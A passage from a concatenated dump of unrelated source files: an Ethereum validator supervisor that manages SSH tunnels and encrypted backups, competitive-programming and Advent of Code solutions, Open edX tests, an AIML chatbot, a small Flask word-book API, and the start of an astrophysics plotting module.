SSHForward(TcpSocket.localhost(22), TcpSocket.localhost(2222), reverse=True),\n # Reverse tunnel to lighthouse validator Prometheus server\n SSHForward(\n TcpSocket.localhost(5064), TcpSocket('validator-proxy', 5064), reverse=True,\n ),\n # Reverse tunnel to prysm validator Prometheus server\n SSHForward(\n TcpSocket.localhost(8081), TcpSocket('validator-proxy', 8081), reverse=True,\n ),\n # Reverse tunnel to RPC server\n 
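# For orientation (hedged: the exact flag mapping depends on how SSHForward\n # is implemented), entries in this list roughly correspond to OpenSSH\n # options, e.g. a local forward \"-L <local>:<remote_host>:<remote_port>\"\n # and, with reverse=True, a remote forward \"-R <remote>:<local_host>:<local_port>\".\n 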
SSHForward(UnixSocket(self.rpc_sock_path), TcpSocket.localhost(8000), reverse=True),\n ]\n for beacon_node_port_map in self._beacon_node_port_maps\n ]\n _, _, _, loki_tunnels, _, _, _, _ = zip(*port_maps)\n self._ssh_clients = [\n SSHClient(node, known_hosts_file, known_hosts_lock)\n for node in config.nodes\n ]\n self._ssh_tunnels = [\n SSHTunnel(client, tunnels)\n for client, tunnels in zip(self._ssh_clients, port_maps)\n ]\n if enable_promtail:\n log_paths = {\n 'validator_supervisor': self.config.supervisor_log_path,\n }\n for impl_name in get_validator_impls():\n log_paths[impl_name] = self.config.validator_log_path(impl_name)\n self._promtails = [\n Promtail(\n node.host,\n forward.local.port,\n self.config.logs_dir,\n log_paths,\n )\n for node, forward in zip(config.nodes, loki_tunnels)\n ]\n else:\n LOG.debug(\"Promtail disabled\")\n self._promtails = []\n self._validator: Optional[ValidatorRunner] = None\n self._validator_stop_event = asyncio.Event()\n self._validator_task: Optional[asyncio.Task] = None\n\n ssl = None\n if config.ssl_cert_file:\n ssl = SSLContext(PROTOCOL_TLS_SERVER)\n ssl.load_cert_chain(config.ssl_cert_file, config.ssl_key_file)\n self._rpc_server = RpcServer(self, config.rpc_users, self.rpc_sock_path, ssl)\n self._exit_event = exit_event\n\n def _alloc_port(self) -> int:\n if self._next_port == self._end_port:\n raise OutOfPorts()\n port = self._next_port\n self._next_port += 1\n return port\n\n @property\n def eth2_network(self) -> str:\n \"\"\"The name of the Ethereum 2.0 network to validate on. (eg. mainnet, pyrmont, etc.)\"\"\"\n return self.config.eth2_network\n\n async def run(self) -> None:\n \"\"\"\n Activate the supervisor, starting the RPC server, SSH tunnels, and other subprocesses.\n\n If the supervisor is already unlocked, this starts the validator subprocess as well.\n\n See class documentation for supervisor responsibilities.\n \"\"\"\n await self._rpc_server.start()\n\n stop_ssh_tunnels = asyncio.Event()\n ssh_tunnel_tasks = await start_supervised_multi(\n [(f\"SSH tunnel to {ssh_tunnel.client.node}\", ssh_tunnel)\n for ssh_tunnel in self._ssh_tunnels],\n self._retry_delay,\n stop_ssh_tunnels,\n )\n\n stop_promtails = asyncio.Event()\n promtail_tasks = await start_supervised_multi(\n [(f\"promtail to {promtail.node}\", promtail) for promtail in self._promtails],\n self._retry_delay,\n stop_promtails,\n )\n\n try:\n await self.start_validator()\n except UnlockRequired:\n LOG.info(\"Waiting for supervisor to be unlocked\")\n except Exception as err:\n LOG.exception(f\"Error starting supervisor\", exc_info=err)\n\n await self._exit_event.wait()\n LOG.debug(\"Exiting\")\n\n # Shutdown time.\n await self._rpc_server.stop()\n await self.stop_validator()\n\n if self._promtails:\n LOG.debug(\"Stopping Promtails\")\n\n # Give Promtail a bit of time to finish uploading logs.\n await asyncio.sleep(3)\n\n stop_promtails.set()\n if promtail_tasks:\n await asyncio.wait(promtail_tasks)\n\n LOG.debug(\"Stopping SSH tunnels\")\n stop_ssh_tunnels.set()\n if ssh_tunnel_tasks:\n await asyncio.wait(ssh_tunnel_tasks)\n\n self._validator_data_tmpdir.cleanup()\n\n async def load_backup(self) -> bool:\n \"\"\"\n Load the latest backup archive containing validator state.\n\n This checks all reachable remote nodes for backups as well as the backup stored locally,\n then decrypts and unpacks the most recent.\n\n :return: whether a backup archive was successfully found and loaded\n :raises UnlockRequired: if supervisor needs to be unlocked\n :raises ValidatorRunning: if the 
validator is currently running\n \"\"\"\n if self._backup_key is None:\n raise UnlockRequired()\n if self._validator_task is not None:\n raise ValidatorRunning()\n\n latest_backup = None\n if os.path.isfile(self._backup_path):\n with open(self._backup_path, 'rb') as f:\n try:\n LOG.info(f\"On disk backup {self._backup_path} len is {len(f.read())}\")\n f.seek(0)\n latest_backup = BackupArchive.unlock(self._backup_key, f)\n except LockedArchiveCorrupted:\n LOG.error(\"On disk backup is corrupt!\")\n\n for client in self._ssh_clients:\n with tempfile.NamedTemporaryFile(prefix=\"supervisor-backup\", suffix=\".bin\", mode=\"w+b\") as downloaded_f:\n try:\n remote_path = f\"~/supervisor-backups/{self._backup_filename}\"\n if not await client.copy_remote_to_local(remote_path, downloaded_f.name):\n LOG.warning(f\"Failed to download scp backup from {client.node}\")\n continue\n\n downloaded_f.seek(0)\n LOG.info(f\"Downloaded len is {len(downloaded_f.read())}\")\n downloaded_f.seek(0)\n new_backup = BackupArchive.unlock(self._backup_key, downloaded_f)\n if latest_backup is None or latest_backup.timestamp < new_backup.timestamp:\n latest_backup = new_backup\n shutil.copy(downloaded_f.name, self._backup_path)\n except LockedArchiveCorrupted:\n LOG.warning(f\"Backup archive on node {client.node} is corrupt!\")\n\n if latest_backup is None:\n LOG.error(\"Could not find any valid backups\")\n return False\n\n backup_time = datetime.datetime.fromtimestamp(latest_backup.timestamp)\n LOG.info(f\"Loading backup from {backup_time.isoformat()}\")\n latest_backup.unpack(self._validator_canonical_dir)\n return True\n\n async def save_backup(self) -> None:\n \"\"\"\n Save the current validator state to a backup archive.\n\n This saves the new encrypted archive persistently and uploads to all reachable remote\n nodes via SCP.\n\n :raises UnlockRequired: if supervisor needs to be unlocked\n :raises ValidatorRunning: if the validator is currently running\n \"\"\"\n if self._backup_key is None:\n raise UnlockRequired()\n if self._validator_task is not None:\n raise ValidatorRunning()\n\n LOG.debug(f\"Saving backup to {self._backup_filename}\")\n make_validator_data_backup(self._backup_key, self._backup_path, self._validator_canonical_dir)\n for client in self._ssh_clients:\n remote_path = f\"~/supervisor-backups/{self._backup_filename}\"\n if await client.copy_local_to_remote(self._backup_path, remote_path):\n LOG.debug(f\"Uploaded scp backup to {client.node}\")\n else:\n LOG.warning(f\"Failed to upload scp backup to {client.node}\")\n\n async def start_validator(self) -> bool:\n \"\"\"\n Start the validator subprocess.\n\n Loads the latest backup before launching.\n\n :return: true if validator was not running and is now started, false if already running\n :raises UnlockRequired: if the supervisor is not unlocked\n \"\"\"\n if self._validator_task is not None:\n return False\n\n await self.load_backup()\n self._validator = await self._create_validator_for_release(\n self.dynamic_config.validator_release\n )\n self._validator_stop_event = asyncio.Event()\n self._validator_task = await start_supervised(\n 'validator',\n self._validator,\n self._retry_delay,\n self._validator_stop_event,\n )\n return True\n\n async def stop_validator(self) -> bool:\n \"\"\"\n Stop the validator subprocess if currently running.\n\n Saves the latest backup after exiting.\n\n :return: true if validator was running and is now stopped, false if not running\n \"\"\"\n if self._validator_task is None:\n return False\n\n 
self._validator_stop_event.set()\n await self._validator_task\n self._validator = None\n self._validator_task = None\n await self.save_backup()\n return True\n\n async def set_validator_release(self, release: ValidatorRelease):\n if self._validator_task is not None:\n raise ValidatorRunning()\n\n _ = await self._create_validator_for_release(release)\n self.dynamic_config.validator_release = release\n write_dynamic_config(self._dynamic_config_path, self.dynamic_config)\n\n async def connect_eth2_node(self, host: str, port: Optional[int]):\n \"\"\"\n Connect the validator to the beacon node running on a particular remote host.\n\n This only prioritizes this specified node. If the host:port destination is either not in\n the config file or not reachable, the supervisor will fall back to another configured\n beacon node.\n\n :param host: the hostname or IP address of the destination\n :param port: the port to the SSH server on the destination\n :raise UnknownNode: if the given node is not already configured\n \"\"\"\n port = port if port is not None else DEFAULT_BASTION_SSH_PORT\n self._prioritize_beacon_node(host, port)\n if self._validator is not None:\n self._validator.beacon_node_ports = self._beacon_node_port_maps\n # Stop the validator, so it restarts and checks the updated order\n self._validator.stop()\n\n async def get_health(self) -> Dict[str, object]:\n \"\"\"\n Returns a dictionary of supervisor status info.\n\n :return: a dictionary of status info\n \"\"\"\n return {\n 'unlocked': self.root_key is not None,\n 'validator_running': self._validator_task is not None,\n 'connected_node': self._validator and self._validator.get_connected_node_host(),\n 'validator_release':\n ValidatorReleaseSchema().dump(self.dynamic_config.validator_release),\n }\n\n async def unlock(self, password: str) -> bool:\n \"\"\"\n Unlock the root key with the password.\n\n Required to load backups and start validator.\n\n :param password: the password\n :return: true if unlock was successful, false on incorrect password\n \"\"\"\n try:\n self.root_key = self.config.key_desc.open(password)\n return True\n except IncorrectPassword:\n return False\n\n async def shutdown(self) -> None:\n \"\"\"Executes the shutdown command on the system and powers down the machine.\"\"\"\n asyncio.create_task(self._shutdown_command())\n\n async def import_keystore(self, keystore: str, password: str) -> None:\n keystore_data = EIP2335KeystoreSchema().load(json.loads(keystore))\n pubkey = f\"0x{keystore_data.pubkey}\"\n\n # This is an assertion as this should be guaranteed by the regex validation on the pubkey\n # field in the keystore schema\n assert os.path.normpath(pubkey) == pubkey\n\n validator_dir = os.path.join(self._validator_canonical_dir, 'validators', pubkey)\n\n await self.load_backup()\n os.makedirs(validator_dir, exist_ok=True)\n with open(os.path.join(validator_dir, 'keystore.json'), 'w') as f:\n f.write(keystore)\n with open(os.path.join(validator_dir, 'password.txt'), 'w') as f:\n f.write(password)\n await self.save_backup()\n\n async def _shutdown_command(self) -> None:\n LOG.info(\"Executing shutdown to shut down the host\")\n proc = await asyncio.create_subprocess_exec('sudo', 'shutdown', 'now')\n await proc.wait()\n LOG.info(f\"shutdown exited with status {proc.returncode}\")\n\n @property\n def _backup_filename(self):\n return self.config.backup_filename\n\n @property\n def _backup_path(self) -> str:\n return os.path.join(self.config.data_dir, self._backup_filename)\n\n @property\n def root_key(self) -> 
Optional[RootKey]:\n return self._root_key\n\n @root_key.setter\n def root_key(self, root_key: Optional[RootKey]):\n self._root_key = root_key\n if root_key is None:\n self._backup_key = None\n else:\n self._backup_key = root_key.derive_backup_key()\n\n def _prioritize_beacon_node(self, host: str, port: int):\n \"\"\"\n Prioritize future connections to a particular node.\n\n :param host: the host address\n :param port: the bastion port of the host through which connections are tunnelled\n :raise UnknownNode: if given host, port pair is not a configured beacon node\n \"\"\"\n try:\n index = next(\n i for i, port_map in enumerate(self._beacon_node_port_maps)\n if port_map.host_id == (host, port)\n )\n except StopIteration:\n raise UnknownNode(f\"{host}:{port}\")\n\n port_map = self._beacon_node_port_maps.pop(index)\n self._beacon_node_port_maps.insert(0, port_map)\n\n async def _create_validator_for_release(self, release: ValidatorRelease) -> ValidatorRunner:\n log_path = self.config.validator_log_path(release.impl_name)\n return await create_validator_for_release(\n release,\n self.eth2_network,\n self.config.fee_recipient,\n self._validator_canonical_dir,\n out_log_filepath=log_path,\n err_log_filepath=log_path,\n beacon_node_ports=self._beacon_node_port_maps,\n container_name=self._validator_container_name,\n )\n","repo_name":"jimpo/eth-staking","sub_path":"supervisor/validator_supervisor/supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":20464,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"71595579764","text":"h,w,n=map(int,input().split())\nal=[]\nbl=[]\nfor _ in range(n):\n a,b=map(int,input().split())\n al.append(a)\n bl.append(b)\nsa={a:i for i,a in enumerate(sorted(list(set(al))),start=1)}\nsb={b:j for j,b in enumerate(sorted(list(set(bl))),start=1)}\nans_a=[]\nans_b=[]\nfor a in al:\n ans_a.append(sa[a])\nfor b in bl:\n ans_b.append(sb[b])\nfor a,b in zip(ans_a,ans_b):\n print(a,b)\n","repo_name":"ymsk-sky/atcoder","sub_path":"abc213/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72397824564","text":"import fileloader as fl\n\n# ============ NAIVE IMPLEMENTATION =========\n# def minusOne(val):\n# return val - 1\n\n# def step(t, state):\n# numBirths = 0\n\n# reduced = list(map(minusOne, state))\n# for i in range(len(reduced)):\n# if reduced[i] == -1:\n# numBirths += 1\n# reduced[i] = 6\n\n# nextState = reduced + ([8] * numBirths)\n\n# return nextState\n\n# def main():\n# runs = 256\n\n# data = fl.loadLines('./day6/input.txt')\n# inputList = data[0].split(',')\n# inputList = list(map(int, inputList))\n\n# fish = inputList\n\n# for t in range(runs):\n# fish = step(t, fish)\n\n# print(\"NUM FISH:\", len(fish))\n# ===========================================\n\ndef step(t, list):\n births = list.pop(0)\n list[6] += births\n list.append(births)\n\n return list\n\ndef processInput(inputList):\n output = [0] * 9\n\n for i in range(len(inputList)):\n output[int(inputList[i])] += 1\n\n return output\n\n\ndef main():\n runs = 256\n\n data = fl.loadLines('./day6/input.txt')\n inputList = data[0].split(',')\n inputBucketList = processInput(inputList)\n # inputList = list(map(int, inputList))\n print(inputBucketList)\n\n fish = inputBucketList\n\n for t in range(runs):\n fish = step(t, fish)\n\n print(\"NUM FISH:\", sum(fish))\n # print(\"NUM FISH:\", len(fish))\n\nif __name__ == 
\"__main__\":\n main()","repo_name":"Kolossion/advent-of-code-2021","sub_path":"day6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73615653364","text":"# 2981 검문\n\nimport math\n\n\ndef gcd(a, b):\n return b if a % b == 0 else gcd(b, a % b)\n\n\nN = int(input())\nlst = [int(input()) for _ in range(N)]\nM = set()\nlst.sort()\n\nn = lst[1] - lst[0]\nfor i in range(2, N):\n n = gcd(n, lst[i] - lst[i - 1])\n\nM.add(n)\n\nfor i in range(2, int(math.sqrt(n)) + 1):\n if n % i == 0:\n M.add(i)\n M.add(n // i)\n\nM = sorted(M)\nfor i in M:\n print(i, end=' ')\n","repo_name":"y2sec/Algorithm","sub_path":"Baekjoon/2981_Problem.py","file_name":"2981_Problem.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38691598203","text":"from datetime import datetime\n\nimport ddt\nfrom celery.states import FAILURE\nfrom django.core.management import call_command\nfrom django.core.management.base import CommandError\n\nfrom lms.djangoapps.instructor_task.models import InstructorTask, QUEUING\nfrom lms.djangoapps.instructor_task.tests.factories import InstructorTaskFactory\nfrom lms.djangoapps.instructor_task.tests.test_base import InstructorTaskTestCase\n\n\n@ddt.ddt\nclass TestFailOldQueueingTasksCommand(InstructorTaskTestCase):\n \"\"\"\n Tests for the `fail_old_queueing_tasks` management command\n \"\"\"\n\n def setUp(self):\n super(TestFailOldQueueingTasksCommand, self).setUp()\n\n type_1_queueing = InstructorTaskFactory.create(\n task_state=QUEUING,\n task_type=\"type_1\",\n task_key='',\n task_id=1,\n )\n type_1_non_queueing = InstructorTaskFactory.create(\n task_state='NOT QUEUEING',\n task_type=\"type_1\",\n task_key='',\n task_id=2,\n )\n\n type_2_queueing = InstructorTaskFactory.create(\n task_state=QUEUING,\n task_type=\"type_2\",\n task_key='',\n task_id=3,\n )\n self.tasks = [type_1_queueing, type_1_non_queueing, type_2_queueing]\n\n def update_task_created(self, created_date):\n \"\"\"\n Override each task's \"created\" date\n \"\"\"\n for task in self.tasks:\n task.created = datetime.strptime(created_date, \"%Y-%m-%d\")\n task.save()\n\n def get_tasks(self):\n \"\"\"\n After the command is run, this queries again for the tasks we created\n in `setUp`.\n \"\"\"\n type_1_queueing = InstructorTask.objects.get(task_id=1)\n type_1_non_queueing = InstructorTask.objects.get(task_id=2)\n type_2_queueing = InstructorTask.objects.get(task_id=3)\n return type_1_queueing, type_1_non_queueing, type_2_queueing\n\n @ddt.data(\n ('2015-05-05', '2015-05-07', '2015-05-06'),\n ('2015-05-05', '2015-05-07', '2015-05-08'),\n ('2015-05-05', '2015-05-07', '2015-05-04'),\n )\n @ddt.unpack\n def test_dry_run(self, after, before, created):\n \"\"\"\n Tests that nothing is updated when run with the `dry_run` option\n \"\"\"\n self.update_task_created(created)\n call_command(\n 'fail_old_queueing_tasks',\n dry_run=True,\n before=before,\n after=after,\n )\n\n type_1_queueing, type_1_non_queueing, type_2_queueing = self.get_tasks()\n self.assertEqual(type_1_queueing.task_state, QUEUING)\n self.assertEqual(type_2_queueing.task_state, QUEUING)\n self.assertEqual(type_1_non_queueing.task_state, 'NOT QUEUEING')\n\n @ddt.data(\n ('2015-05-05', '2015-05-07', '2015-05-06', FAILURE),\n ('2015-05-05', '2015-05-07', '2015-05-08', QUEUING),\n ('2015-05-05', '2015-05-07', '2015-05-04', QUEUING),\n )\n 
@ddt.unpack\n def test_tasks_updated(self, after, before, created, expected_state):\n \"\"\"\n Test that tasks created outside the window of dates don't get changed,\n while tasks created in the window do get changed.\n Verifies that non-queueing tasks never get changed.\n \"\"\"\n self.update_task_created(created)\n\n call_command('fail_old_queueing_tasks', before=before, after=after)\n\n type_1_queueing, type_1_non_queueing, type_2_queueing = self.get_tasks()\n self.assertEqual(type_1_queueing.task_state, expected_state)\n self.assertEqual(type_2_queueing.task_state, expected_state)\n self.assertEqual(type_1_non_queueing.task_state, 'NOT QUEUEING')\n\n def test_filter_by_task_type(self):\n \"\"\"\n Test that if we specify which task types to update, only tasks with\n those types are updated\n \"\"\"\n self.update_task_created('2015-05-06')\n call_command(\n 'fail_old_queueing_tasks',\n before='2015-05-07',\n after='2015-05-05',\n task_type=\"type_1\",\n )\n type_1_queueing, type_1_non_queueing, type_2_queueing = self.get_tasks()\n self.assertEqual(type_1_queueing.task_state, FAILURE)\n # the other type of task shouldn't be updated\n self.assertEqual(type_2_queueing.task_state, QUEUING)\n self.assertEqual(type_1_non_queueing.task_state, 'NOT QUEUEING')\n\n @ddt.data(\n ('2015-05-05', None),\n (None, '2015-05-05'),\n )\n @ddt.unpack\n def test_date_errors(self, after, before):\n \"\"\"\n Test that we get a CommandError when we don't supply before and after\n dates.\n \"\"\"\n with self.assertRaises(CommandError):\n call_command('fail_old_queueing_tasks', before=before, after=after)\n","repo_name":"risualSupport/edx-platform2-dev","sub_path":"lms/djangoapps/instructor_task/management/commands/tests/test_fail_old_queueing_tasks.py","file_name":"test_fail_old_queueing_tasks.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6565121815","text":"#!/usr/bin/env python\nimport aiml\nk = aiml.Kernel()\nk.learn(\"learningFileList.aiml\")\nk.respond(\"LEARN AIML\")\nwhile True:\n reply = k.respond(input(\"User > \"))\n if reply:\n print(\"bot > \", reply)\n else:\n print(\"bot > :) \", )\n","repo_name":"chaninou/appa","sub_path":"chatbot/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2794920033","text":"######## API ##########################################\n\n# Module\n# $ pip install -U Flask-SQLAlchemy\nimport json\nfrom flask import request\nfrom . import create_app, database\nfrom .models import wordtable\nfrom flask import redirect, url_for\n\n# Flask 객체 생성 \napp = create_app()\n\n# CRUD\n## get\n@app.route('/result', methods=['GET'])\ndef read():\n wordbooks = database.get_all(wordtable)\n all_wordtable = []\n for words in wordbooks:\n new_wordbook = {\n \"id\": words.id,\n \"word\": words.word,\n \"area\": words.area,\n \"mean\": words.mean1\n }\n\n all_wordtable.append(new_wordbook)\n return json.dumps(all_wordtable), 200\n\n## POST METHOD\n@app.route('/add', methods = ['POST'])\ndef add():\n\n # 데이터 요청\n word = request.form['word']\n area = request.form['area']\n mean = request.form['mean']\n\n database.add_instance(wordtable, word=word, area=area, mean=mean)\n return redirect('result') # 1. 주소이동 redirect('url명') 2. 
함수로 이동 redirect(url_for('함수명'))\n\n\n\n\n\n\n########### minimal flask app ####################\n\n# @app.route(\"/\")\n# def hello_world():\n#     return \"Hello, World!\"\n\n# @app.route(\"/<name>\")\n# def hello(name):\n#     return f\"Hello, {escape(name)}!\"\n\n############ routing ################################\n\n# @app.route('/')\n# def index():\n#     return 'Index Page'\n\n# @app.route('/hello')\n# def hello():\n#     return 'Hello, World'\n\n############# routing variable rules #####################\n\n# @app.route(\"/<name>\")\n# def hello(name):\n#     return f\"Hello, {escape(name)}\"\n\n# @app.route('/user/<username>')\n# def show_user_profile(username):\n#     # show the user profile for that user\n#     return f'User {escape(username)}'\n\n# @app.route('/post/<int:post_id>')\n# def show_post(post_id):\n#     # show the post with the given id, the id is an integer\n#     return f'Post {post_id}'\n\n# @app.route('/path/<path:subpath>')\n# def show_subpath(subpath):\n#     # show the subpath after /path/\n#     return f'Subpath {escape(subpath)}'\n\n\n############### url trailing slash ######################\n# without a trailing slash, the url is more unique\n\n# @app.route('/projects/') # works with or without a trailing slash\n# def projects():\n#     return 'The project page'\n\n# @app.route('/about') # works only without a trailing slash\n# def about():\n#     return 'The about page'\n\n################ URL Building : url_for() ################\n# from flask import url_for\n\n# @app.route('/')\n# def index():\n#     return 'index'\n\n# @app.route('/login')\n# def login():\n#     return 'login'\n\n# @app.route('/user/<username>')\n# def profile(username):\n#     return f'{username}\\'s profile'\n\n# # how to check urls - print the url corresponding to each function\n# with app.test_request_context():\n#     print(url_for('index'))\n#     print(url_for('login'))\n#     print(url_for('login', next='/'))\n#     print(url_for('profile', username='John Doe'))\n\n################ HTTP method #################################\n# method 1 ---------------------------------\n# from flask import request\n\n# def do_the_login():\n#     return \"do the login\"\n\n# def show_the_login_form():\n#     return \"id , pw\"\n\n# @app.route('/login', methods=['GET', 'POST'])\n# def login():\n#     if request.method == 'POST':\n#         return do_the_login()\n#     else:\n#         return show_the_login_form()\n\n# method 2 ------------------------------------\n# @app.get('/login')\n# def login_get():\n#     return show_the_login_form()\n\n# @app.post('/login')\n# def login_post():\n#     return do_the_login()\n\n###################### Static Files ###################\n# that’s usually where the CSS and JavaScript files are coming from\n\n","repo_name":"minsoo-s/Self_Study","sub_path":"t3q-Infra/mission-3tier-app/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18420487121","text":"import numpy as np\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport datetime\nfrom functools import reduce\n\nfrom quasarscan.preprocessing import parse_metadata\nfrom quasarscan.utils import roman,ion_lists\nfrom quasarscan.utils.utils import sort_ions,reversearray\nfrom quasarscan.utils.variable_lists import stringcriteria,intensives,intensiveslabels,\\\n                                sightline_xVars,param_xVars,\\\n                                sightline_unit_labels,param_unit_labels,\\\n                                all_known_variables\nfrom quasarscan.plotting.quasar_array_handler import QuasarArrayHandler\nfrom quasarscan.plotting import var_labels_interpreter,\\\n                                plot_data_processor,\\\n                                errorbar_processor,\\\n                                matplotlib_interfacer\n\n#these are a number of global lists and dictionaries which are checked against in various places\n\nclass BadPlotError(Exception):\n    def __init__(self,message):\n        self.message = message\n        print(self.message)\n\nclass MultiQuasarSpherePlotter():\n    
#summary: initialize mq and load all data\n    #\n    #inputs: loadsim: if not 'all' only load certain simulations (e.g. 'VELA')\n    #        loadobs: if not 'all' only load certain observational datasets (e.g. 'COS-Halos') [I'm not sure this works]\n    #        loadempty: if not 'none' also load 'empty' QuasarSpheres\n    #        average: default averaging method to use for plots. Will default to 'median' if not given\n    #\n    #outputs: MultiQuasarSpherePlotter object, usually called 'mq'\n    def __init__(self, loadsim = \"all\",loadobs = 'all',loadempty = 'none',average = 'median'):\n        self.defaultaverage = average\n        self.quasar_array_handler = QuasarArrayHandler(loadsim,loadobs,loadempty)\n\n    #summary: print length of list of QuasarSpheres\n    #\n    #inputs: None\n    #\n    #outputs: length of currentQuasarArray\n    def length(self,include_nonsims=False):\n        return self.quasar_array_handler.length(include_nonsims)\n\n    def list_all_quasar_spheres(self,*criteria,qtype='sim',log=False):\n        self.quasar_array_handler.list_all_quasar_spheres(*criteria,qtype=qtype,log=log)\n\n    def get_qlist(self,qtype='sim'):\n        return self.quasar_array_handler.get_qlist(qtype)\n    \n    #summary: cancel all constraints\n    #\n    #inputs: None\n    # \n    #outputs: None, changes state of mq.currentQuasarArray and mq.currentQuasarArrayName\n    def reset_current_quasar_array(self):\n        self.quasar_array_handler.reset_current_quasar_array()\n    \n    #summary: splits currentQuasarArray into particular bins, either calculated on the fly or given\n    #\n    #inputs: criteria: what criteria to constrain by (simname, simnum, Mvir, Rvir, SFR, \n    #                  etc. See 'quasar_sphere.py' for full list)\n    #        bins: a list of n numbers, which determine n-1 bins in between them. If string param, n strings which each\n    #              constitute a bin\n    #        atEnd: if True, compare values by their final (z=1 or z=minimum among remaining values) value, \n    #               not the current one\n    #        splitEven: a number of bins to split into. 
The bins will be chosen so each has the same number of members.\n # **kwargs: onlyNonempty,reverse ['postprocess_sorted']\n # \n #outputs: labels: list of strings for labelling points in legend\n # bins: the bins to compare to \n # quasarBins: list of lists of quasarSphere objects that fit in the bins\n # obsBins: list of lists of observationalQuasarSphere objects that fit in the bins\n # \n # NOTE: These are usually combined together and considered an 'lq' object, passed directly \n # into most plots (any except type 0) general use case is e.g.\n # >>>lq = mq.sort_by('Mvir',[0,10**11,np.inf])\n # >>>mq.plot_err('O VI',lq=lq)\n def sort_by(self, criteria, bins = [0,np.inf],at_end = False,split_even = False,reverse=False,**kwargs):\n return self.quasar_array_handler.sort_by(criteria,bins,at_end,split_even,reverse,**kwargs)\n\n def sort_by_2D(self, criteria_x,criteria_y, bins_x = [0,np.inf],bins_y = [0,np.inf],\\\n at_end_x = False,at_end_y = False,split_even_x = False,split_even_y = False,\\\n reverse_x = False,reverse_y = False,**kwargs):\n return self.quasar_array_handler.sort_by_2D(criteria_x,criteria_y, bins_x,bins_y,at_end_x,at_end_y,\\\n split_even_x,split_even_y,reverse_x,reverse_y,**kwargs)\n\n #summary: restricts to only quasarspheres with galaxy parameters within certain limits\n #\n #inputs: constrainCriteria: what criteria to constrain by (simname, simnum, Mvir, Rvir, SFR, \n # etc. See 'quasar_sphere.py' for full list)\n # bins: either a list of two numbers, if a numerical criteria, or several strings if string criteria\n # can leave as None if splitEven is used\n # **kwargs: changeArrayName, exclude ['change_array_name']\n # splitEven,atEnd,set_main_array,sortobs ['constrain_array_helper']\n # \n #outputs: return the bins used (in the case of 'low' or 'high' for example it'll tell you the cutoff)\n def constrain_current_quasar_array(self, constrain_criteria,bins=None,qtype='all',**kwargs):\n return self.quasar_array_handler.constrain_current_quasar_array(constrain_criteria,bins,qtype,**kwargs)\n \n def plot_err(self,yVar,xVar='rdivR',qtype = 'sim',average = 'default',force_averaging = False,**kwargs):\n average = self.defaultaverage if average == 'default' else average\n average = 'scatter' if qtype == 'obs' and not force_averaging else average\n plot_type,xVar_packet,yVar_packet,labels,filter_for = var_labels_interpreter.configure_variables(xVar,yVar,average,**kwargs)\n unfiltered_qlist = self.quasar_array_handler.impose_requirements(filter_for,qtype)\n xlabel,ylabel,title_final = var_labels_interpreter.get_labels_and_titles(plot_type,xVar_packet,yVar_packet,average,**kwargs)\n quasar_array = var_labels_interpreter.decide_quasar_array(qtype,self.quasar_array_handler.get_qlist(qtype),**kwargs)\n xarys,yarys = plot_data_processor.get_xy_vals(plot_type,xVar_packet,yVar_packet,quasar_array,**kwargs)\n if qtype == 'sim' or force_averaging:\n xs,ys,xerrs,yerrs,empty = errorbar_processor.get_sim_errs(plot_type,xVar_packet,yVar_packet,xarys,yarys,average = average,**kwargs)\n if not empty:\n to_return = matplotlib_interfacer.plot_sim_on_ax(plot_type, xs, ys, xerrs, yerrs, xlabel, ylabel, labels, title_final, **kwargs) \n elif qtype == 'obs':\n xs,ys,empty = errorbar_processor.process_scatter_points(xVar_packet,yVar_packet,xarys,yarys,**kwargs)\n xerrs,yerrs = errorbar_processor.handle_scatter_errs(xVar_packet,yVar_packet,quasar_array)\n if not empty:\n to_return = matplotlib_interfacer.plot_obs_on_ax(plot_type, xs, ys, xerrs, yerrs, xlabel, ylabel, labels, title_final, quasar_array, 
**kwargs)\n elif qtype == 'empty':\n assert plot_type == 3\n xs,ys,empty = errorbar_processor.process_scatter_points(xVar_packet,yVar_packet,xarys,yarys,**kwargs)\n xerrs,yerrs = None,None\n if not empty:\n to_return = matplotlib_interfacer.plot_sim_on_ax(plot_type, xs, ys, xerrs, yerrs, xlabel, ylabel, labels, title_final, **kwargs)\n if empty:\n to_return = None,None\n self.quasar_array_handler.update_qlist(qtype,unfiltered_qlist)\n return to_return\n\n def plot_scatter(self,yVar,xVar='rdivR',qtype = 'sim',**kwargs):\n plot_type,xVar_packet,yVar_packet,labels,filter_for = var_labels_interpreter.configure_variables(xVar,yVar,'scatter',**kwargs)\n unfiltered_qlist = self.quasar_array_handler.impose_requirements(filter_for,qtype)\n xlabel,ylabel,title = var_labels_interpreter.get_labels_and_titles(plot_type,xVar_packet,yVar_packet,'scatter',**kwargs)\n quasar_array = var_labels_interpreter.decide_quasar_array(qtype,self.quasar_array_handler.get_qlist(qtype),**kwargs)\n xarys,yarys = plot_data_processor.get_xy_vals(plot_type,xVar_packet,yVar_packet,quasar_array,**kwargs)\n xs,ys,empty = errorbar_processor.process_scatter_points(xVar_packet,yVar_packet,xarys,yarys,**kwargs)\n if qtype == 'obs':\n xerrs,yerrs = errorbar_processor.handle_scatter_errs(xVar_packet,yVar_packet,quasar_array)\n if not empty:\n to_return = matplotlib_interfacer.plot_obs_on_ax(plot_type, xs, ys, xerrs, yerrs, xlabel, ylabel, labels, title, quasar_array, **kwargs)\n elif qtype in ['sim','empty']:\n xerrs,yerrs = None,None\n if not empty:\n to_return = 